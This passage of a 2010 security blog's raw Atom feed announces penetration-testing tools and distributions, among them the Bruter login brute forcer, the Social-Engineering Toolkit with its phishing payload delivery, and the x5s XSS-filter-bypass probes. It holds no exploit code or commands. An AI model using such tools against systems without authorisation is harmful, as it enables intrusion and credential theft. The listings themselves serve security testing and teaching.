DEFT Linux 5.1, is a small maintenance update, which brings some newer packages and fixes a couple of bugs &lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;What’s new?&lt;/span&gt;&lt;br /&gt;Update: Sleuthkit 3.1.1 and Autopsy 2.24&lt;br /&gt;Update: Xplico to 0.5.7 (100% support of SIP – RTP codec g711, g729, g722, g723 and g726, SDP and RTCP)&lt;br /&gt;Update: Initrd &lt;br /&gt;Bug fix: Dhash report  (reports were not generated)&lt;br /&gt;Bug fix: DEFT Extra bug fix (a few tools did not work if the operator click on their icons, added the dd tool for x64 machines) &lt;br /&gt;&lt;br /&gt;Download: &lt;a href="http://www.deftlinux.net/2010/05/04/deft-linux-5-1-ready-for-download/"&gt;http://www.deftlinux.net&lt;/a&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5305311560066067589-2824934307765752786?l=pinoysecurity.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://pinoysecurity.blogspot.com/feeds/2824934307765752786/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://pinoysecurity.blogspot.com/2010/06/deft-linux-51-computer-forensic-live-cd.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5305311560066067589/posts/default/2824934307765752786'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5305311560066067589/posts/default/2824934307765752786'/><link rel='alternate' type='text/html' href='http://pinoysecurity.blogspot.com/2010/06/deft-linux-51-computer-forensic-live-cd.html' title='DEFT Linux 5.1 Computer Forensic Live CD'/><author><name>Val Buenaventura</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://3.bp.blogspot.com/_vUW0F0UxPvk/S45WgdxFeSI/AAAAAAAAAJ0/YNWfwcul12w/S220/pinoysecurity.jpg'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://4.bp.blogspot.com/_xJ5LrusWfss/S-G6VBzwp2I/AAAAAAAAAZw/XLT47daE9u4/s72-c/forensic-software.png' height='72' width='72'/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5305311560066067589.post-957446523249584477</id><published>2010-06-24T10:59:00.000+08:00</published><updated>2010-06-24T11:00:46.428+08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Tools'/><title type='text'>Live Hacking Linux Security Distro Bootable CD</title><content type='html'>&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://4.bp.blogspot.com/_xJ5LrusWfss/S-6L-wu0nII/AAAAAAAAAa4/KyzDCSksbQ4/s1600/Live-Hacking-CD.gif" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="200" src="http://4.bp.blogspot.com/_xJ5LrusWfss/S-6L-wu0nII/AAAAAAAAAa4/KyzDCSksbQ4/s200/Live-Hacking-CD.gif" width="185" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;Live Hacking CD is a new Linux distribution packed with tools and utilities for ethical hacking, penetration testing and countermeasure verification. Based on Ubuntu this ‘Live CD” runs directly from the CD and doesn’t require installation on your hard-drive. Once booted you can use the included tools to test, check, ethically hack and perform penetration tests on your own network to make sure that it is secure from outside intruders.&lt;br /&gt;&lt;br /&gt;The CD comes in two forms. A full Linux desktop including a graphical user interface (GNOME) and applications like Firefox along with tools and utilities for DNS enumeration, reconnaissance, foot-printing, password cracking and network sniffing. For greater accessibility there is a Live Hacking menu to help you quick find and launch the tools.&lt;br /&gt;&lt;br /&gt;The second variation is the Live Hacking Mini CD, which is command line only. However this doesn't detract from the power of the tools and utilities included as most of the penetration testing and ethical hacking tools are command line tools. The included /lh directory has symbolic links to the different tools included.&lt;br /&gt;&lt;br /&gt;Download: &lt;a href="http://www.livehacking.com/cd-dvd/download.htm"&gt;http://www.livehacking.com&lt;/a&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5305311560066067589-957446523249584477?l=pinoysecurity.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://pinoysecurity.blogspot.com/feeds/957446523249584477/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://pinoysecurity.blogspot.com/2010/06/live-hacking-linux-security-distro.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5305311560066067589/posts/default/957446523249584477'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5305311560066067589/posts/default/957446523249584477'/><link rel='alternate' type='text/html' href='http://pinoysecurity.blogspot.com/2010/06/live-hacking-linux-security-distro.html' title='Live Hacking Linux Security Distro Bootable CD'/><author><name>Val Buenaventura</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://3.bp.blogspot.com/_vUW0F0UxPvk/S45WgdxFeSI/AAAAAAAAAJ0/YNWfwcul12w/S220/pinoysecurity.jpg'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://4.bp.blogspot.com/_xJ5LrusWfss/S-6L-wu0nII/AAAAAAAAAa4/KyzDCSksbQ4/s72-c/Live-Hacking-CD.gif' height='72' width='72'/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5305311560066067589.post-1944011727342239752</id><published>2010-06-22T17:25:00.000+08:00</published><updated>2010-06-24T10:52:48.490+08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Tools'/><title type='text'>Lens version 1.0.0.1</title><content type='html'>&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://1.bp.blogspot.com/_xJ5LrusWfss/S--v5DTbenI/AAAAAAAAAbA/V64-GBv3blw/s1600/Lens+-+ViewState.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="200" src="http://1.bp.blogspot.com/_xJ5LrusWfss/S--v5DTbenI/AAAAAAAAAbA/V64-GBv3blw/s200/Lens+-+ViewState.png" width="200" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;span style="font-weight: bold;"&gt;&amp;nbsp; &lt;/span&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;Lens ASP.NET Penetration Testing Tool&lt;/span&gt; &lt;br /&gt;&lt;br /&gt;Lens is an open-source ethical hacking tool specialized to penetration testing of ASP.NET web applications. Lens is written in WPF 4 and its internal modular architecture allows us to easily add new tests to the system. &lt;br /&gt;&lt;span style="font-weight: bold;"&gt;Base features &lt;/span&gt;&lt;br /&gt;Resize-friendly window structure&lt;br /&gt;Window position is preserved across sessions&lt;br /&gt;Built-in zoom&lt;br /&gt;Detailed log window&lt;br /&gt;Links to online information about the attacks and fixes&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;You can use our Lens tool to test your site against the following attacks&lt;/span&gt;&lt;br /&gt;Session state &lt;br /&gt;Eavesdropping&lt;br /&gt;Session fixation (available in v.1.0.0.1)&lt;br /&gt;Forms authentication &lt;br /&gt;Eavesdropping&lt;br /&gt;ViewState &lt;br /&gt;Eavesdropping (available in v.1.0.0.1)&lt;br /&gt;Information disclosure (available in v.1.0.0.1)&lt;br /&gt;Event handler bypass&lt;br /&gt;Event handling &lt;br /&gt;Postback to disabled controls&lt;br /&gt;Postback to invisible controls&lt;br /&gt;One-click attack&lt;br /&gt;&lt;br /&gt;Download: &lt;a href="http://ethicalhackingaspnet.codeplex.com/releases/view/45324"&gt;http://ethicalhackingaspnet.codeplex.com&lt;/a&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5305311560066067589-1944011727342239752?l=pinoysecurity.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://pinoysecurity.blogspot.com/feeds/1944011727342239752/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://pinoysecurity.blogspot.com/2010/06/lens-version-1001.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5305311560066067589/posts/default/1944011727342239752'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5305311560066067589/posts/default/1944011727342239752'/><link rel='alternate' type='text/html' href='http://pinoysecurity.blogspot.com/2010/06/lens-version-1001.html' title='Lens version 1.0.0.1'/><author><name>Val Buenaventura</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://3.bp.blogspot.com/_vUW0F0UxPvk/S45WgdxFeSI/AAAAAAAAAJ0/YNWfwcul12w/S220/pinoysecurity.jpg'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://1.bp.blogspot.com/_xJ5LrusWfss/S--v5DTbenI/AAAAAAAAAbA/V64-GBv3blw/s72-c/Lens+-+ViewState.png' height='72' width='72'/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5305311560066067589.post-1545083549608660728</id><published>2010-06-20T12:32:00.001+08:00</published><updated>2010-06-20T12:35:15.816+08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Tools'/><title type='text'>Bruter 1.0</title><content type='html'>&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://2.bp.blogspot.com/_vUW0F0UxPvk/TB2Zn52z_FI/AAAAAAAAAMw/ac_NlLaj9CA/s1600/Bruter+1.0+Worawita.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="193" src="http://2.bp.blogspot.com/_vUW0F0UxPvk/TB2Zn52z_FI/AAAAAAAAAMw/ac_NlLaj9CA/s200/Bruter+1.0+Worawita.png" width="200" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;Bruter is a parallel network login brute forcer on Win32 platform only. It currently supports following services: FTP, HTTP (Basic), HTTP (Form), IMAP, MSSQL, MySQL, POP3,SMB-NT, SMTP, SNMP, SSH2, Telnet, VNC. &lt;br /&gt;&lt;br /&gt;To see full changelog since alpha version check:&lt;a href="http://sourceforge.net/projects/worawita/files/Bruter/Bruter%201.0/Changelog.txt/view"&gt;http://sourceforge.net/projects/worawita/files/Bruter/Bruter%201.0/Changelog.txt/view&lt;/a&gt; &lt;br /&gt;&lt;br /&gt;Download: &lt;a href="http://sourceforge.net/projects/worawita/"&gt;http://sourceforge.net/projects/worawita&lt;/a&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5305311560066067589-1545083549608660728?l=pinoysecurity.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://pinoysecurity.blogspot.com/feeds/1545083549608660728/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://pinoysecurity.blogspot.com/2010/06/bruter-10.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5305311560066067589/posts/default/1545083549608660728'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5305311560066067589/posts/default/1545083549608660728'/><link rel='alternate' type='text/html' href='http://pinoysecurity.blogspot.com/2010/06/bruter-10.html' title='Bruter 1.0'/><author><name>Val Buenaventura</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://3.bp.blogspot.com/_vUW0F0UxPvk/S45WgdxFeSI/AAAAAAAAAJ0/YNWfwcul12w/S220/pinoysecurity.jpg'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://2.bp.blogspot.com/_vUW0F0UxPvk/TB2Zn52z_FI/AAAAAAAAAMw/ac_NlLaj9CA/s72-c/Bruter+1.0+Worawita.png' height='72' width='72'/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5305311560066067589.post-4283603509923217329</id><published>2010-06-16T20:10:00.000+08:00</published><updated>2010-06-16T20:12:17.566+08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Tools'/><title type='text'>Social-Engineering Toolkit</title><content type='html'>&lt;div class="separator" style="clear: both; text-align: left;"&gt;&lt;span style="font-weight: bold;"&gt;&amp;nbsp;&lt;/span&gt;&lt;a href="http://3.bp.blogspot.com/_xJ5LrusWfss/S8mX_eHCk-I/AAAAAAAAAW4/A5L8shLF7Eg/s1600/set.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="100" src="http://3.bp.blogspot.com/_xJ5LrusWfss/S8mX_eHCk-I/AAAAAAAAAW4/A5L8shLF7Eg/s200/set.jpg" width="200" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: left;"&gt;&lt;span style="color: black;"&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: left;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: left;"&gt;&lt;span style="color: black;"&gt;The Social-Engineering Toolkit (SET) is a python-driven suite of custom tools which solely focuses on attacking the human element of penetration testing. It's main purpose is to augment and simulate social-engineering attacks and allow the tester to effectively test how a targeted attack may succeed. Currently SET has two main methods of attack, one is utilizing.&lt;/span&gt;Metasploit payloads and Java-based attacks by setting up a malicious website that ultimately delivers your payload. The second method is through file-format bugs and e-mail phishing. The second method supports your own open-mail relay, a customized sendmail open-relay, or Gmail integration to deliver your payloads through e-mail. The goal of SET is to bring awareness to the often forgotten attack vector of social-engineering. &lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: left;"&gt;&lt;br /&gt;Download: &lt;a href="http://www.social-engineer.org/framework/Computer_Based_Social_Engineering_Tools:_Social_Engineer_Toolkit_%28SET%29"&gt;http://www.social-engineer.org&lt;/a&gt; &lt;br /&gt;&lt;br /&gt;For more info and video demo check: &lt;a href="http://www.secmaniac.com/"&gt;David Kennedy (ReL1K) website&lt;/a&gt;&lt;/div&gt;&lt;h3 class="post-title entry-title"&gt;&lt;a href="http://security-sh3ll.blogspot.com/2010/04/social-engineer-toolkit-set-05-released.html"&gt;&lt;br /&gt;&lt;/a&gt;&lt;/h3&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5305311560066067589-4283603509923217329?l=pinoysecurity.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://pinoysecurity.blogspot.com/feeds/4283603509923217329/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://pinoysecurity.blogspot.com/2010/06/social-engineering-toolkit.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5305311560066067589/posts/default/4283603509923217329'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5305311560066067589/posts/default/4283603509923217329'/><link rel='alternate' type='text/html' href='http://pinoysecurity.blogspot.com/2010/06/social-engineering-toolkit.html' title='Social-Engineering Toolkit'/><author><name>Val Buenaventura</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://3.bp.blogspot.com/_vUW0F0UxPvk/S45WgdxFeSI/AAAAAAAAAJ0/YNWfwcul12w/S220/pinoysecurity.jpg'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://3.bp.blogspot.com/_xJ5LrusWfss/S8mX_eHCk-I/AAAAAAAAAW4/A5L8shLF7Eg/s72-c/set.jpg' height='72' width='72'/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5305311560066067589.post-4379568846971755176</id><published>2010-06-14T11:53:00.000+08:00</published><updated>2010-06-16T20:04:15.160+08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Tools'/><title type='text'>x5s - Automated Cross-Site Scripting</title><content type='html'>&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://4.bp.blogspot.com/_xJ5LrusWfss/S7wLnvRTj8I/AAAAAAAAAV4/1sD8mh2jZ2w/s1600/FUCK+YOU%21.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="161" src="http://4.bp.blogspot.com/_xJ5LrusWfss/S7wLnvRTj8I/AAAAAAAAAV4/1sD8mh2jZ2w/s200/FUCK+YOU%21.jpg" width="200" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;x5s is a &lt;a class="externalLink" href="http://www.fiddler2.com/"&gt;Fiddler&lt;span class="externalLinkIcon"&gt;&lt;/span&gt;&lt;/a&gt; addon which aims to assist penetration testers in finding cross-site scripting vulnerabilities. It's main goal is to help you identify the hotspots where XSS might occur by:&lt;br /&gt;&lt;br /&gt;&lt;ul&gt;&lt;li&gt;Detecting where safe encodings were not applied to emitted user-inputs&lt;/li&gt;&lt;li&gt;Detecting where Unicode character transformations might bypass security filters&lt;/li&gt;&lt;li&gt;Detecting where non-shortest UTF-8 encodings might bypass security filters&lt;/li&gt;&lt;/ul&gt;It injects ASCII to find traditional encoding issues, and it injects special Unicode characters and encodings to help an analyst identify where XSS filters might be bypassed. The approach to finding these hotspots involves injecting single-character probes separately into each input field of each request, and detecting how they were later emitted. The focus is on reflected XSS issues however persisted issues can also be detected. The idea of injecting special Unicode characters and non-shortest form encodings was to identify where transformations occur which could be used to bypass security filters. This also has the interesting side effect of illuminating how all of the fields in a Web-app handle Unicode. For example, in a single page with many inputs, you may end up seeing the same test case get returned in a variety of ways – URL encoded, NCR encoded, ill-encoded, raw, replaced, dropped, etc. In some cases where we’ve had Watcher running in conjunction, we’ve been able to detect ill-formed UTF-8 byte sequences which is indicative of ‘other’ problems.&lt;br /&gt;&lt;br /&gt;x5s acts as an assistant to the security tester by speeding up the process of parameter manipulation and aggregating the results for quick viewing. It automates some of the preliminary XSS testing work by enumerating and injecting canaries into all input fields/parameters sent to an application and analyzing how those canaries were later emitted. E.g. Was the emitted output encoded safely or not? Did an injected character transform to something else? &lt;br /&gt;&lt;br /&gt;x5s does not inject XSS payloads - it does not attempt to exploit or confirm an XSS vulnerability. It's designed to draw your attention to the fields and parameters which seem likely candidates for vulnerability. A security-tester would review the results to find issues where special characters were dangerously transformed or emitted without a safe encoding. This can be done by quickly scanning the results, which have been designed with the intention of providing quick visual inspection. Results filters are also included so the tester could simply click &lt;b&gt;show hotspots&lt;/b&gt; to see only the potential problem areas. After identifying a hotspot it's the tester's job to perform further validation and XSS testing.&lt;br /&gt;&lt;br /&gt;The types of test cases that x5s includes:&lt;br /&gt;&lt;ol&gt;&lt;li&gt;&lt;b&gt;Traditional&lt;/b&gt; test cases - characters typically used to test for XSS injection such as &amp;lt;, &amp;gt;, ",and ' which are used to control HTML, CSS, or javascript;&lt;/li&gt;&lt;li&gt;&lt;b&gt;Transformable&lt;/b&gt; test cases - characters that might uppercase, lowercase, Normalize, best-fit map, or other wise transform to completely different characters, E.g. the Turkish 'İ' which will lower-case to 'i' in culture-aware software.&lt;/li&gt;&lt;li&gt;&lt;b&gt;Overlong UTF-8&lt;/b&gt; test cases - non-shortest UTF-8 encodings of the 'traditional' test cases noted above. E.g. the ASCII &amp;lt; is 0x3C normally and 0xC0 0xBC in non-shortest form UTF-8.&lt;/li&gt;&lt;/ol&gt;&lt;br /&gt;&lt;a href="http://xss.codeplex.com/"&gt;&lt;br /&gt;&lt;/a&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5305311560066067589-4379568846971755176?l=pinoysecurity.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://pinoysecurity.blogspot.com/feeds/4379568846971755176/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://pinoysecurity.blogspot.com/2010/06/x5s-automated-cross-site-scripting.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5305311560066067589/posts/default/4379568846971755176'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5305311560066067589/posts/default/4379568846971755176'/><link rel='alternate' type='text/html' href='http://pinoysecurity.blogspot.com/2010/06/x5s-automated-cross-site-scripting.html' title='x5s - Automated Cross-Site Scripting'/><author><name>Val Buenaventura</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://3.bp.blogspot.com/_vUW0F0UxPvk/S45WgdxFeSI/AAAAAAAAAJ0/YNWfwcul12w/S220/pinoysecurity.jpg'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://4.bp.blogspot.com/_xJ5LrusWfss/S7wLnvRTj8I/AAAAAAAAAV4/1sD8mh2jZ2w/s72-c/FUCK+YOU%21.jpg' height='72' width='72'/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5305311560066067589.post-9169916519211369680</id><published>2010-06-11T13:30:00.006+08:00</published><updated>2010-06-11T13:48:59.325+08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Tools'/><title type='text'>W3af v1.0-rc3</title><content type='html'>&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://3.bp.blogspot.com/_vUW0F0UxPvk/TBHKp8zguPI/AAAAAAAAAMo/rSTKjAJMNg4/s1600/w3af+1.0.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="200" src="http://3.bp.blogspot.com/_vUW0F0UxPvk/TBHKp8zguPI/AAAAAAAAAMo/rSTKjAJMNg4/s200/w3af+1.0.jpg" width="200" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;W3af, is a Web Application Attack and Audit Framework. The w3af core and it’s plugins are fully written in python. The project has more than 130 plugins, which check for SQL injection, cross site scripting (xss), local and remote file inclusion and much&lt;br /&gt;&lt;br /&gt;The development team is proud to announce a new w3af release! Some of the features of the 1.0-rc3 version are: &lt;br /&gt;&lt;br /&gt;* Enhanced GUI, including huge changes in the MITM proxy and the Fuzzy Request Editor &lt;br /&gt;* Increased speed by rewriting parts of the thread management code &lt;br /&gt;* Fixed tons of bugs &lt;br /&gt;* Reduced memory usage &lt;br /&gt;* Many plugins were rewritten using different techniques that use less HTTP requests to identify the same vulnerabilities &lt;br /&gt;* Reduced false positives &lt;br /&gt;&lt;br /&gt;You can download the latest versions from the official w3af website: &lt;a href="http://w3af.sf.net/"&gt;http://w3af.sf.net&lt;/a&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5305311560066067589-9169916519211369680?l=pinoysecurity.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://pinoysecurity.blogspot.com/feeds/9169916519211369680/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://pinoysecurity.blogspot.com/2010/06/w3af-v10-rc3.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5305311560066067589/posts/default/9169916519211369680'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5305311560066067589/posts/default/9169916519211369680'/><link rel='alternate' type='text/html' href='http://pinoysecurity.blogspot.com/2010/06/w3af-v10-rc3.html' title='W3af v1.0-rc3'/><author><name>Val Buenaventura</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://3.bp.blogspot.com/_vUW0F0UxPvk/S45WgdxFeSI/AAAAAAAAAJ0/YNWfwcul12w/S220/pinoysecurity.jpg'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://3.bp.blogspot.com/_vUW0F0UxPvk/TBHKp8zguPI/AAAAAAAAAMo/rSTKjAJMNg4/s72-c/w3af+1.0.jpg' height='72' width='72'/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5305311560066067589.post-6561943662357701056</id><published>2010-06-10T11:55:00.001+08:00</published><updated>2010-06-10T11:58:18.348+08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Tools'/><title type='text'>Jacknsee</title><content type='html'>&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://1.bp.blogspot.com/_xJ5LrusWfss/S6p79g16aNI/AAAAAAAAAVA/73h_z-6jcVY/s1600/screenshot.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="136" src="http://1.bp.blogspot.com/_xJ5LrusWfss/S6p79g16aNI/AAAAAAAAAVA/73h_z-6jcVY/s200/screenshot.jpg" width="200" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;Jacknsee is an educational network security tool. Its purpose is to teach students in computer science how basic hijacking techniques are used to corrupt a network. A few examples are given: man in the middle, DoS, stack buffer overflow attack &lt;br /&gt;&lt;br /&gt;Video demo: &lt;a href="http://jacknsee.sourceforge.net/demo.html"&gt;http://jacknsee.sourceforge.net/demo.html&lt;/a&gt; &lt;br /&gt;&lt;br /&gt;Download and more info: &lt;a href="http://jacknsee.sourceforge.net/"&gt;http://jacknsee.sourceforge.net&lt;/a&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5305311560066067589-6561943662357701056?l=pinoysecurity.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://pinoysecurity.blogspot.com/feeds/6561943662357701056/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://pinoysecurity.blogspot.com/2010/06/jacknsee-educational-network-security.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5305311560066067589/posts/default/6561943662357701056'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5305311560066067589/posts/default/6561943662357701056'/><link rel='alternate' type='text/html' href='http://pinoysecurity.blogspot.com/2010/06/jacknsee-educational-network-security.html' title='Jacknsee'/><author><name>Val Buenaventura</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://3.bp.blogspot.com/_vUW0F0UxPvk/S45WgdxFeSI/AAAAAAAAAJ0/YNWfwcul12w/S220/pinoysecurity.jpg'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://1.bp.blogspot.com/_xJ5LrusWfss/S6p79g16aNI/AAAAAAAAAVA/73h_z-6jcVY/s72-c/screenshot.jpg' height='72' width='72'/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5305311560066067589.post-1405935888684875998</id><published>2010-06-08T11:42:00.001+08:00</published><updated>2010-06-10T11:58:18.350+08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Tools'/><title type='text'>SamuraiWTF 0.8</title><content type='html'>&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://3.bp.blogspot.com/_xJ5LrusWfss/S5GLpIIfSUI/AAAAAAAAAT4/0C0_uMfTEp4/s1600/Screenshot.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="160" src="http://3.bp.blogspot.com/_xJ5LrusWfss/S5GLpIIfSUI/AAAAAAAAAT4/0C0_uMfTEp4/s200/Screenshot.png" width="200" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;Web penetration testing live CD built on open source software &lt;/span&gt;&lt;br /&gt;&lt;br /&gt;The Samurai Web Testing Framework is a live linux environment that has been pre-configured to function as a web pen-testing environment. The CD contains the best of the open source and free tools that focus on testing and attacking websites. In developing this environment, we have based our tool selection on the tools we use in our security practice. We have included the tools used in all four steps of a web pen-test. &lt;br /&gt;&lt;br /&gt;&lt;span style="font-style: italic;"&gt;This version includes metasploit, target applications and tons of tool updates. It is now DVD sized as it has out grown the CD release&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;More info and Download: &lt;a href="http://samurai.inguardians.com/"&gt;http://samurai.inguardians.com&lt;/a&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5305311560066067589-1405935888684875998?l=pinoysecurity.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://pinoysecurity.blogspot.com/feeds/1405935888684875998/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://pinoysecurity.blogspot.com/2010/06/samuraiwtf-08.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5305311560066067589/posts/default/1405935888684875998'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5305311560066067589/posts/default/1405935888684875998'/><link rel='alternate' type='text/html' href='http://pinoysecurity.blogspot.com/2010/06/samuraiwtf-08.html' title='SamuraiWTF 0.8'/><author><name>Val Buenaventura</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://3.bp.blogspot.com/_vUW0F0UxPvk/S45WgdxFeSI/AAAAAAAAAJ0/YNWfwcul12w/S220/pinoysecurity.jpg'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://3.bp.blogspot.com/_xJ5LrusWfss/S5GLpIIfSUI/AAAAAAAAAT4/0C0_uMfTEp4/s72-c/Screenshot.png' height='72' width='72'/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5305311560066067589.post-137399158001694078</id><published>2010-06-07T16:42:00.002+08:00</published><updated>2010-06-07T17:17:57.497+08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='XSS'/><title type='text'>SpiderLabs Defacetool</title><content type='html'>DefaceTool is an open-source Java Server Faces(JSF)testing tool for 